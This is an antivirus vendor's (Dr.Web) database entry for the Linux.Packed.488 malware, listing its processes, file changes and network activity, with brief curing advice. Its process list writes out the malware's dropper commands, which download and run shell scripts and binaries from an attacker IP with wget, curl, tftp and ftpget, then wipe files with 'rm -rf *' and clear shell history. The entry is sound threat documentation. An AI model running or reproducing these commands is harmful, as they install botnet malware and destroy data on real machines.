Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Packed.488

Added to the Dr.Web virus database: 2019-06-30

Virus description added:

Technical Information

Malicious functions:
Launches itself as a daemon
Launches processes:
  • sh -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.80.39.242/gang1.sh; curl -O http://45.80.39.242/gang1.sh; chmod 777 gang1.sh; sh gang1.sh; tftp 45.80.39.242 -c get efad.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.80.39.242; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.80.39.242 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c
  • wget http://45.80.39.242/gang1.sh
  • chmod 777 gang1.sh
  • sh gang1.sh
  • wget http://webserver.c/Onezz.mips
  • chmod +x Onezz.mips
  • ./Onezz.mips
  • rm -rf Onezz.mips
  • wget http://webserver.c/Onezz.mpsl
  • chmod +x Onezz.mpsl
  • ./Onezz.mpsl
  • rm -rf Onezz.mpsl
Performs operations with the file system:
Modifies file access rights:
  • /tmp/gang1.sh
Creates or modifies files:
  • /tmp/gang1.sh
  • /tmp/gang1.sh.1
  • /tmp/gang1.sh.2
  • /tmp/gang1.sh.2.1
  • /tmp/gang1.sh.2.2
  • /tmp/gang1.sh.3
  • /tmp/gang1.sh.3.1
  • /tmp/gang1.sh.3.2
  • /tmp/gang1.sh.4
  • /tmp/gang1.sh.4.1
  • /tmp/gang1.sh.4.2
  • /tmp/gang1.sh.5
  • /tmp/gang1.sh.5.1
  • /tmp/gang1.sh.5.2
  • /tmp/gang1.sh.6
  • /tmp/gang1.sh.6.1
  • /tmp/gang1.sh.7
  • /tmp/gang1.sh.7.1
  • /tmp/gang1.sh.7.2
  • /tmp/gang1.sh.8
  • /tmp/gang1.sh.8.1
  • /tmp/gang1.sh.9
  • /tmp/gang1.sh.9.1
  • /tmp/gang1.sh.10
  • /tmp/gang1.sh.9.2
  • /tmp/gang1.sh.10.1
  • /tmp/gang1.sh.11
  • /tmp/gang1.sh.10.2
  • /tmp/gang1.sh.11.1
  • /tmp/gang1.sh.12
  • /tmp/gang1.sh.12.1
  • /tmp/gang1.sh.12.2
  • /tmp/gang1.sh.13
  • /tmp/gang1.sh.13.1
  • /tmp/gang1.sh.13.2
Deletes files:
  • /tmp/Onezz.mips
Network activity:
Establishes connection:
  • 8.#.8.8:53
  • 45.##.39.242:1337
  • <LOCAL_DNS_SERVER>
  • 127.0.0.1:53
HTTP GET requests:
  • 45.##.#9.242/gang1.sh
DNS ASK:
  • we##erver.c
Sends data to the following servers:
  • 45.##.39.242:1337
Receives data from the following servers:
  • 45.##.39.242:1337
  • <LOCAL_DNS_SERVER>

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number